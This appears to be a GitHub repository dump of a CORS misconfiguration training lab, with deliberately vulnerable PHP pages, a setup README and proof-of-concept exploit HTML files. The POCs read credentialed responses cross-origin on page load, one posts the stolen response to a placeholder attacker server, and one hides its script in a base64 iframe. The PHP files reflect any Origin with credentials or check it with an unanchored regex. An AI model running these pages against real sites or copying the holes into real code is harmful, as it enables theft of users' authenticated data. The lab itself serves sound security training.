├── POCs
    ├── CORS_policy_arbitrary_origin_exploit.gif
    ├── CORS_policy_null_origin_exploit_chrome.gif
    ├── Data ex-filtration.gif
    ├── README.md
    ├── arbitrary_origin_exploit.html
    ├── data_exfiltrate_Arbitrary_origin.html
    └── null_origin_exploit_chrome.html
├── README.md
├── arbitrary_origin.php
├── bad_regex.php
├── c0nnection.php
├── database
    └── ica_lab.sql
├── ica_lab.sql
├── images
    ├── arbitrary_origin.png
    ├── arbitrary_poc.png
    ├── bad_regex 1.png
    ├── bad_regex 2.png
    ├── bad_regex 3.png
    ├── bad_regex 4.png
    ├── db_conf1.png
    ├── db_conf2.png
    ├── head.jpg
    ├── lab.png
    ├── lab_login.png
    ├── matrix.gif
    ├── matrix2.gif
    ├── null_origin 1.png
    ├── null_origin 2.png
    ├── null_origin_POC.png
    ├── null_origin_POC_data.png
    ├── null_origin_POC_encoding.png
    └── null_origin_POC_final.png
├── index.php
├── login.php
└── null_origin.php


/POCs/CORS_policy_arbitrary_origin_exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/POCs/CORS_policy_arbitrary_origin_exploit.gif


--------------------------------------------------------------------------------
/POCs/CORS_policy_null_origin_exploit_chrome.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/POCs/CORS_policy_null_origin_exploit_chrome.gif


--------------------------------------------------------------------------------
/POCs/Data ex-filtration.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/POCs/Data ex-filtration.gif


--------------------------------------------------------------------------------
/POCs/README.md:
--------------------------------------------------------------------------------
1 | This directory has POC exploit for CORS exploitation.
2 | 


--------------------------------------------------------------------------------
/POCs/arbitrary_origin_exploit.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <title>--==[[ CORS ]]==--</title>
 3 | <STYLE>
 4 | body {
 5 |     
 6 | background-position: center center;
 7 | background-repeat: no-repeat;
 8 | background-size: 400px 200px;
 9 | background-color: #000000;
10 | background-attachment: fixed;
11 | font-family: Tahoma
12 | }
13 | submit {
14 | BORDER:  buttonhighlight 2px outset;
15 | BACKGROUND-COLOR: white;
16 | width: 40%;
17 | color: white;
18 | }
19 | input {
20 | border            : solid 2px;
21 | border-color        : #333;
22 | BACKGROUND-COLOR: black;
23 | font: 10pt comic sans ms;
24 | color: white;
25 | }
26 | </STYLE>
27 | <body bgcolor=black>
28 | <div align=center>
29 | <table width="100%" cellspacing="0" cellpadding="0" class="tb1" style="border: dashed 2px #333">
30 | <td width="100%" align=center valign="top" rowspan="1" >
31 | <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Arbitrary  Origin </font><font color=white size=5 face="comic sans ms"><b> mis-configured </font><font color=green size=5 face="comic sans ms"><b>CORS policy POC ]]==--</font> <div class="hedr">
32 | <td height="10" align="left" class="td1"></td></tr><tr><td
33 | width="100%" align="center" valign="top" rowspan="1"><font
34 | color="red" face="comic sans ms"size="1"><b>
35 | <font color=#ff9933>
36 | ################################################</font><font color=white>################################################</font><font color=green>################################################</font><br>
37 | </table>
38 | </table> <div align=center><font size=4 color=white face="comic sans ms"><img src="https://www.technopat.net/sosyal/styles/default/xenforo/smilies/matrix.gif"> --==[[ haxor gonna hack ]]==-- <img src="https://web.archive.org/web/20140704135452/freesmileys.org/smileys/smiley-flag010.gif"></font>
39 | <font color=white size=4 face="comic sans ms">        
40 | <br># - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # 
41 | <br>
42 | <script>
43 | //Function which will make CORS request to target application web page to grab the HTTP response
44 | function exploit() {
45 |  var xhttp = new XMLHttpRequest();
46 |  xhttp.onreadystatechange = function() {
47 |    if (this.readyState == 4 && this.status == 200) {
48 |      var all = this.responseText;
49 |      document.getElementById("load").innerHTML= all; // print the stolen HTTP response in division
50 |      
51 |       }
52 |  };
53 |  xhttp.open("GET", "http://indishell.lab/cors-vulnerable-lab/arbitrary_origin.php", true); //change the URL to the one which has mis-configured CORS policy
54 |  xhttp.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,\/;q=0.8");
55 |  xhttp.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
56 |  xhttp.withCredentials = true;
57 |  xhttp.send();
58 | }
59 | 
60 | </script>
61 | <body onload="exploit()">
62 | <div align=center style="margin: 10px 20px 20px; word-wrap: break-word;">
63 | Here goes stolen HTTP response 8-)<br> <br>
64 | <textarea id="load" rows=10 cols=60 style="BACKGROUND-COLOR: black; color: white; border: 2px dashed #333;;"></textarea>
65 | </body>
66 | </html>


--------------------------------------------------------------------------------
/POCs/data_exfiltrate_Arbitrary_origin.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <title>--==[[ CORS ]]==--</title>
 3 | <STYLE>
 4 | body {
 5 |     
 6 | background-position: center center;
 7 | background-repeat: no-repeat;
 8 | background-size: 400px 200px;
 9 | background-color: #000000;
10 | background-attachment: fixed;
11 | font-family: Tahoma
12 | }
13 | submit {
14 | BORDER:  buttonhighlight 2px outset;
15 | BACKGROUND-COLOR: white;
16 | width: 40%;
17 | color: white;
18 | }
19 | input {
20 | border            : solid 2px;
21 | border-color        : #333;
22 | BACKGROUND-COLOR: black;
23 | font: 10pt comic sans ms;
24 | color: white;
25 | }
26 | </STYLE>
27 | <body bgcolor=black>
28 | <div align=center>
29 | <table width="100%" cellspacing="0" cellpadding="0" class="tb1" style="border: dashed 2px #333">
30 | <td width="100%" align=center valign="top" rowspan="1" >
31 | <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Arbitrary  Origin </font><font color=white size=5 face="comic sans ms"><b> mis-configured </font><font color=green size=5 face="comic sans ms"><b>CORS policy POC ]]==--</font> <div class="hedr">
32 | <td height="10" align="left" class="td1"></td></tr><tr><td
33 | width="100%" align="center" valign="top" rowspan="1"><font
34 | color="red" face="comic sans ms"size="1"><b>
35 | <font color=#ff9933>
36 | ################################################</font><font color=white>################################################</font><font color=green>################################################</font><br>
37 | </table>
38 | </table> <div align=center><font size=4 color=white face="comic sans ms"><img src="https://www.technopat.net/sosyal/styles/default/xenforo/smilies/matrix.gif"> --==[[ haxor gonna hack ]]==-- <img src="https://web.archive.org/web/20140704135452/freesmileys.org/smileys/smiley-flag010.gif"></font>
39 | <font color=white size=4 face="comic sans ms">        
40 | <br># - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # 
41 | <br>
42 | <script>
43 | //Function which will make CORS request to target application web page to grab the HTTP response
44 | function exploit() {
45 |  var xhttp = new XMLHttpRequest();
46 |  xhttp.onreadystatechange = function() {
47 |    if (this.readyState == 4 && this.status == 200) {
48 |      var all = this.responseText;
49 |      exfiltrate(all); // Ghuma de sodda \m/
50 |      
51 |       }
52 |  };
53 |  xhttp.open("GET", "http://indishell.lab/cors-vulnerable-lab/arbitrary_origin.php", true); //change the URL to the one which has mis-configured CORS policy
54 |  xhttp.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,\/;q=0.8");
55 |  xhttp.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
56 |  xhttp.withCredentials = true;
57 |  xhttp.send();
58 | }
59 | 
60 | function exfiltrate(data_all) {
61 |        var xhr = new XMLHttpRequest();
62 |        xhr.open("POST", "http://attacker_controlled_server/", true); //Replace the URL with attacker controlled Server
63 |        
64 |        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
65 |        xhr.withCredentials = true;
66 |        var body = data_all;//Data which attacker want to exfiltrate
67 |        var aBody = new Uint8Array(body.length);
68 |        for (var i = 0; i < aBody.length; i++)
69 |          aBody[i] = body.charCodeAt(i); 
70 |        xhr.send(new Blob([aBody]));
71 | }
72 | 
73 | </script>
74 | <body onload="exploit()">
75 | <div align=center style="margin: 10px 20px 20px; word-wrap: break-word;">
76 | Check attacker server for stolen HTTP response 8-)<br> <br>
77 | </body>
78 | </html>
79 | 


--------------------------------------------------------------------------------
/POCs/null_origin_exploit_chrome.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <title>--==[[ CORS ]]==--</title>
 3 | <STYLE>
 4 | body {
 5 | 
 6 | background-position: center center;
 7 | background-repeat: no-repeat;
 8 | background-size: 400px 200px;
 9 | background-color: #000000;
10 | background-attachment: fixed;
11 | font-family: Tahoma
12 | }
13 | submit {
14 | BORDER:  buttonhighlight 2px outset;
15 | BACKGROUND-COLOR: white;
16 | width: 40%;
17 | color: white;
18 | }
19 | iframe {
20 | border            : 0px;
21 | border-color        : #333;
22 | BACKGROUND-COLOR: black;
23 | font: 10pt comic sans ms;
24 | color: white;
25 | }
26 | </STYLE>
27 | 
28 | <body bgcolor=black>
29 | <div align=center>
30 | <table width="100%" cellspacing="0" cellpadding="0" class="tb1" style="border: dashed 2px #333">
31 | 
32 | 
33 | 
34 | <td width="100%" align=center valign="top" rowspan="1" >
35 | <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ </font><font color=white size=5 face="comic sans ms"><b>mis-configured CORS policy POC</font><font color=green size=5 face="comic sans ms"><b> ]]==--</font> <div class="hedr">
36 | 
37 | <td height="10" align="left" class="td1"></td></tr><tr><td
38 | width="100%" align="center" valign="top" rowspan="1"><font
39 | color="red" face="comic sans ms"size="1"><b>
40 | <font color=#ff9933>
41 | ################################################</font><font color=white>################################################</font><font color=green>################################################</font><br>
42 | 
43 | </table>
44 | </table> <div align=center><font size=4 color=white face="comic sans ms"><img src="https://www.technopat.net/sosyal/styles/default/xenforo/smilies/matrix.gif"> --==[[ haxor gonna hack ]]==-- <img src="https://web.archive.org/web/20140704135452/freesmileys.org/smileys/smiley-flag010.gif"></font>
45 | 
46 | 
47 | <font color=white size=4 face="comic sans ms">
48 | <br># - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #
49 | <br>
50 | <br>
51 | 
52 | <div align=center style="margin: 10px 20px 20px; word-wrap: break-word;">
53 | 
54 | 
55 | Extracted data goes here 8-)<br>
56 | <iframe  width=70% height=50% src="data:text/html;base64,Cgo8U1RZTEU+CnRleHRhcmVhIHsKYm9yZGVyICAgICAgICAgICAgOiBkYXNoZWQgMnB4Owpib3JkZXItY29sb3IgICAgICAgIDogIzMzMzsKQkFDS0dST1VORC1DT0xPUjogYmxhY2s7CmZvbnQ6IDEwcHQgY29taWMgc2FucyBtczsKY29sb3I6IHdoaXRlOwp9CjwvU1RZTEU+CjxzY3JpcHQ+CgpmdW5jdGlvbiBleHBsb2l0KCkgewp2YXIgeGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKeGh0dHAub25yZWFkeXN0YXRlY2hhbmdlID0gZnVuY3Rpb24oKSB7CiAgaWYgKHRoaXMucmVhZHlTdGF0ZSA9PSA0ICYmIHRoaXMuc3RhdHVzID09IDIwMCkgewogICAgCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibG9hZCIpLmlubmVySFRNTD0gdGhpcy5yZXNwb25zZVRleHQ7CiAgICAKICAgICB9Cn07CnhodHRwLm9wZW4oIkdFVCIsICJodHRwOi8vaW5kaXNoZWxsLmxhYi9jb3JzLXZ1bG5lcmFibGUtbGFiL251bGxfb3JpZ2luLnBocCIsIHRydWUpOwp4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCJBY2NlcHQiLCAidGV4dFwvaHRtbCxhcHBsaWNhdGlvblwveGh0bWwreG1sLGFwcGxpY2F0aW9uXC94bWw7cT0wLjksKlwvKjtxPTAuOCIpOwp4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCJBY2NlcHQtTGFuZ3VhZ2UiLCAiZW4tVVMsZW47cT0wLjUiKTsKeGh0dHAud2l0aENyZWRlbnRpYWxzID0gdHJ1ZTsKeGh0dHAuc2VuZCgpOwp9CgoKPC9zY3JpcHQ+PGRpdiBhbGlnbj1jZW50ZXI+Cjxib2R5IG9ubG9hZD0iZXhwbG9pdCgpIiBhbGlnbj1jZW50ZXI+Cjx0ZXh0YXJlYSBpZD0ibG9hZCIgcm93cz0xNSBjb2xzPTUwPjwvdGV4dGFyZWE+" rows=15 cols=50></iframe>
57 | </body>
58 | </html>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | 
  2 | # CORS misconfiguration vulnerable Lab
  3 | This Repository contains CORS misconfiguration related vulnerable codes. One can configure the vulnerable code on local machine to perform practical exploitation of CORS related misconfiguration issues.
  4 | 
  5 | I would like to say Thank You to @albinowax (For his work in CORS exploitation), AKReddy and Vivek Sir (For being great personalities who always supported me) and Andrew Sir - @vanderaj (for his encouraging words)
  6 | 
  7 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/lab_login.png)
  8 | 
  9 | # Setup the lab on Machine
 10 | Following are the pre-requities to configure the vulnerable code on local/remote machine
 11 | 
 12 |   1. Apache web server
 13 |   2. PHP 5/7
 14 |   3. MySQL Database
 15 | 
 16 | <b>Steps to Configure:</b>
 17 | 
 18 | 1. Download and extract the codes in "htdocs" or webroot  directory of the web server.
 19 | 2. Open PHPMyAdmin and create new database with name "ica_lab".
 20 | 3. If you want to use MySQL "root" user account, skip below mentioned step and jump to step no. 5.
 21 | 4. create a new user having name "billu" by executing below mentioned SQL command: (skip step no. 5)
 22 | 
 23 |          grant all on ica_lab.* to billu@localhost IDENTIFIED BY 'b0x_billu';
 24 | 5. Open "c0nnection.php" in text editor and make below mentioned changes in the PHP:
 25 | 
 26 |           change 
 27 |           $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
 28 |           to
 29 |           $conn = mysqli_connect("127.0.0.1","root","","ica_lab");
 30 | 6. In PHPMyAdmin, select "database" and then click database name "ica_lab".
 31 | 7. Click "Import" button and browse the locate the SQL dump file "ica_lab.sql" on your local machine. This file is present in directory "database" of the repository.
 32 | 8. After browsing the SQL database file, click "Go" button. Now. database is ready.
 33 | 9. Access the "CORS Vulnerable Lab" application.
 34 | 10. Login credentials are already specified in input fileds, just click "Let Me In" button and you are ready to play with the lab. 
 35 | 
 36 | 
 37 | # Challenges available in this lab
 38 | There are 3 misconfiguration which are simulated in this Lab. 
 39 | 
 40 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/lab.png)
 41 | 
 42 | <b>Application Trust Arbitrary Origin</b>
 43 | 
 44 | Application accept CORS request from any Origin. The code put the "Origin" value in HTTP response header "Access-Control-Allow-Origin". Now, this configuration will allow any script from any "Origin" to make CORS request to application. Web browser will perform standard CORS request checks and Script from malicious domain will be able to steal the data. 
 45 | 
 46 | <b>Application has bad "regex" Implementation to check Trusted Origin</b>
 47 | 
 48 | Application has CORS policy implemented and perform "Regex" check for whitelisted Domain/Sub-domains. In this scenario, application has weak regex implementation in code which just check for presence of domain name "b0x.com" anywhere in HTTP request "Origin" header. If HTTP header "Origin" has value "inb0x.com" or b0x.comlab.com, regex will mark it pass. This misconfiguration will lead to sharing of data over cross origin. 
 49 | 
 50 | <b>Application Trust "null" Origin</b>
 51 | 
 52 | In this scenario, application HTTP response header "Access-Control-Allow-Origin" is always set to "null". When user specify any value other than null, application does not process it and keep reflecting "null" in HTTP response. There are few tricks which allow an attacker to perform exploitation and can ex-filtrate data of victim using CORS request. 
 53 | 
 54 | <b>Examples:</b>
 55 | 
 56 | <b>Application Trust Arbitrary Origin</b>
 57 | 
 58 | Application accept any value specified in "Origin" header.
 59 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/arbitrary_origin.png)
 60 | 
 61 | Exploitation Demo
 62 | 
 63 | ![](https://github.com/incredibleindishell/CORS-vulnerable-Lab/blob/master/POCs/CORS_policy_arbitrary_origin_exploit.gif)
 64 | 
 65 | <b>Application has bad "regex" Implementation to check Trusted Origin</b>
 66 | 
 67 | Application is trusting whitelisted Origin.
 68 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/bad_regex%201.png)
 69 | 
 70 | Application is not allowing any arbitrary Origin.
 71 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/bad_regex%202.png)
 72 | 
 73 | Application weak regex allowing an Origin which has whitelisted domain string in starting of the domain name.
 74 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/bad_regex%203.png)
 75 | 
 76 | Application weak regex allowing an Origin which has whitelisted domain string in the end of the domain name.
 77 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/bad_regex%204.png)
 78 | 
 79 | <b>Application Trust "null" Origin</b>
 80 | 
 81 | Application accept "null" value specified in "Origin" header.
 82 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/null_origin%202.png)
 83 | 
 84 | Application is not accepting any value other then "null" "Origin".
 85 | ![](https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/master/images/null_origin%202.png)
 86 | 
 87 | Exploitation Demo
 88 | 
 89 | ![](https://github.com/incredibleindishell/CORS-vulnerable-Lab/blob/master/POCs/CORS_policy_null_origin_exploit_chrome.gif)
 90 | 
 91 | <b> Ex-filtrating data to attacker controlled server
 92 | 
 93 | ![](https://github.com/incredibleindishell/CORS-vulnerable-Lab/blob/master/POCs/Data%20ex-filtration.gif)
 94 | 
 95 | Ofcourse, 
 96 | <br><b>--==[[ With Love From IndiShell ]]==--</b> <img src="https://web.archive.org/web/20140704135452/freesmileys.org/smileys/smiley-flag010.gif">
 97 | 
 98 | 
 99 | 
100 | --==[[ Greetz To ]]==--
101 | 
102 | 	Guru ji zero, Code breaker ICA, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
103 | 	Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
104 | 	Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256
105 | 	Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, D2, Bikash Dash and rest of the Team INDISHELL
106 | 
107 | --==[[Love to]]==--
108 | 
109 | 	My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP
110 | 	Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Hacker fantastic, Jennifer Arcuri, Thecolonial and Don(Deepika kaushik)
111 | 
112 | 


--------------------------------------------------------------------------------
/arbitrary_origin.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | session_start();
 3 | header( 'b0x-Powered-By: White beard Pirates 8-)' );
 4 | 
 5 | if($_SESSION['logged2']!=true)
 6 | 	{
 7 | 		header('Location: login.php', true, 302);
 8 | 		exit;
 9 | 	}
10 | 
11 | if (isset($_SERVER['HTTP_ORIGIN']))
12 | 	{
13 | 		header("Access-Control-Allow-Origin: ".$_SERVER['HTTP_ORIGIN']."");
14 | 		header('Access-Control-Allow-Credentials: true');
15 | 	}
16 | 
17 | echo '<div align=center style="margin: 30px;">Welcome, Fetch the HTTP response of this web page using CORS request and That\'s all  \m/. Lesson learned, never trust arbitrary "Origin"</div>';
18 | 
19 | 
20 | ?>


--------------------------------------------------------------------------------
/bad_regex.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | session_start();
 3 | header( 'b0x-Powered-By: White beard Pirates 8-)' );
 4 | 
 5 | if($_SESSION['logged2']!=true)
 6 | 	{
 7 | 		header('Location: login.php', true, 302);
 8 | 		exit;
 9 | 	}
10 | 
11 | if (isset($_SERVER['HTTP_ORIGIN']) && preg_match('#b0x.com#', $_SERVER['HTTP_ORIGIN']))
12 | 	{
13 | 		header("Access-Control-Allow-Origin: ".$_SERVER['HTTP_ORIGIN']."");
14 | 		header('Access-Control-Allow-Credentials: true');
15 | 	}
16 | 
17 | 
18 | echo '<div align=center style="margin: 30px;">Welcome, Fetch the HTTP response of this web page using CORS request and That\'s all  \m/. Remember, use "regex" carefully</div>';
19 | 
20 | 
21 | 
22 | ?>


--------------------------------------------------------------------------------
/c0nnection.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | header('X-Frame-Options: SAMEORIGIN');
 3 | header( 'Server: Testing only' );
 4 | header( 'X-Powered-By: White beard Pirates 8-)' );
 5 | 
 6 | ini_set( 'session.cookie_httponly', 1 );
 7 | //error_reporting(0);
 8 | $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
 9 | 
10 | // Check connection
11 | if (mysqli_connect_errno())
12 |   {
13 |   echo "connection to SQL server failed ->  " . mysqli_connect_error();
14 |   }
15 | 
16 | 
17 | ?>


--------------------------------------------------------------------------------
/database/ica_lab.sql:
--------------------------------------------------------------------------------
 1 | -- phpMyAdmin SQL Dump
 2 | -- version 4.8.3
 3 | -- https://www.phpmyadmin.net/
 4 | --
 5 | -- Host: 127.0.0.1
 6 | -- Generation Time: Apr 25, 2019 at 03:04 PM
 7 | -- Server version: 10.1.36-MariaDB
 8 | -- PHP Version: 5.6.38
 9 | 
10 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
11 | SET AUTOCOMMIT = 0;
12 | START TRANSACTION;
13 | SET time_zone = "+00:00";
14 | 
15 | 
16 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
17 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
18 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
19 | /*!40101 SET NAMES utf8mb4 */;
20 | 
21 | --
22 | -- Database: `ica_lab`
23 | --
24 | 
25 | -- --------------------------------------------------------
26 | 
27 | --
28 | -- Table structure for table `auth`
29 | --
30 | 
31 | CREATE TABLE `auth` (
32 |   `id` int(50) NOT NULL,
33 |   `username` varchar(256) NOT NULL,
34 |   `password` varchar(256) NOT NULL
35 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
36 | 
37 | --
38 | -- Dumping data for table `auth`
39 | --
40 | 
41 | INSERT INTO `auth` (`id`, `username`, `password`) VALUES
42 | (1, 'ace', 'fire');
43 | COMMIT;
44 | 
45 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
46 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
47 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
48 | 


--------------------------------------------------------------------------------
/ica_lab.sql:
--------------------------------------------------------------------------------
 1 | -- phpMyAdmin SQL Dump
 2 | -- version 4.8.3
 3 | -- https://www.phpmyadmin.net/
 4 | --
 5 | -- Host: 127.0.0.1
 6 | -- Generation Time: Apr 25, 2019 at 03:04 PM
 7 | -- Server version: 10.1.36-MariaDB
 8 | -- PHP Version: 5.6.38
 9 | 
10 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
11 | SET AUTOCOMMIT = 0;
12 | START TRANSACTION;
13 | SET time_zone = "+00:00";
14 | 
15 | 
16 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
17 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
18 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
19 | /*!40101 SET NAMES utf8mb4 */;
20 | 
21 | --
22 | -- Database: `ica_lab`
23 | --
24 | 
25 | -- --------------------------------------------------------
26 | 
27 | --
28 | -- Table structure for table `auth`
29 | --
30 | 
31 | CREATE TABLE `auth` (
32 |   `id` int(50) NOT NULL,
33 |   `username` varchar(256) NOT NULL,
34 |   `password` varchar(256) NOT NULL
35 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
36 | 
37 | --
38 | -- Dumping data for table `auth`
39 | --
40 | 
41 | INSERT INTO `auth` (`id`, `username`, `password`) VALUES
42 | (1, 'ace', 'fire');
43 | COMMIT;
44 | 
45 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
46 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
47 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
48 | 


--------------------------------------------------------------------------------
/images/arbitrary_origin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/arbitrary_origin.png


--------------------------------------------------------------------------------
/images/arbitrary_poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/arbitrary_poc.png


--------------------------------------------------------------------------------
/images/bad_regex 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/bad_regex 1.png


--------------------------------------------------------------------------------
/images/bad_regex 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/bad_regex 2.png


--------------------------------------------------------------------------------
/images/bad_regex 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/bad_regex 3.png


--------------------------------------------------------------------------------
/images/bad_regex 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/bad_regex 4.png


--------------------------------------------------------------------------------
/images/db_conf1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/db_conf1.png


--------------------------------------------------------------------------------
/images/db_conf2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/db_conf2.png


--------------------------------------------------------------------------------
/images/head.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/head.jpg


--------------------------------------------------------------------------------
/images/lab.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/lab.png


--------------------------------------------------------------------------------
/images/lab_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/lab_login.png


--------------------------------------------------------------------------------
/images/matrix.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/matrix.gif


--------------------------------------------------------------------------------
/images/matrix2.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/matrix2.gif


--------------------------------------------------------------------------------
/images/null_origin 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/null_origin 1.png


--------------------------------------------------------------------------------
/images/null_origin 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/null_origin 2.png


--------------------------------------------------------------------------------
/images/null_origin_POC.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/null_origin_POC.png


--------------------------------------------------------------------------------
/images/null_origin_POC_data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/null_origin_POC_data.png


--------------------------------------------------------------------------------
/images/null_origin_POC_encoding.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/null_origin_POC_encoding.png


--------------------------------------------------------------------------------
/images/null_origin_POC_final.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/CORS-vulnerable-Lab/4c0d324a3cc27adbcc71f8a5777f409a01440f80/images/null_origin_POC_final.png


--------------------------------------------------------------------------------
/index.php:
--------------------------------------------------------------------------------
  1 | <?php 
  2 | session_start();
  3 | 
  4 | 
  5 | if($_SESSION['logged2']!=true)
  6 | 	{
  7 | 		header('Location: login.php', true, 302);
  8 | 		exit;
  9 | 	}
 10 | 
 11 | 
 12 | if(isset($_POST['logout']))
 13 | 		{
 14 | 			session_destroy();
 15 | 			header('Location: login.php', true, 302);
 16 | 		}
 17 | 
 18 | ?>
 19 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 20 | <STYLE>
 21 | BODY {
 22 | color: #ffffff;
 23 | background-color: #000000;
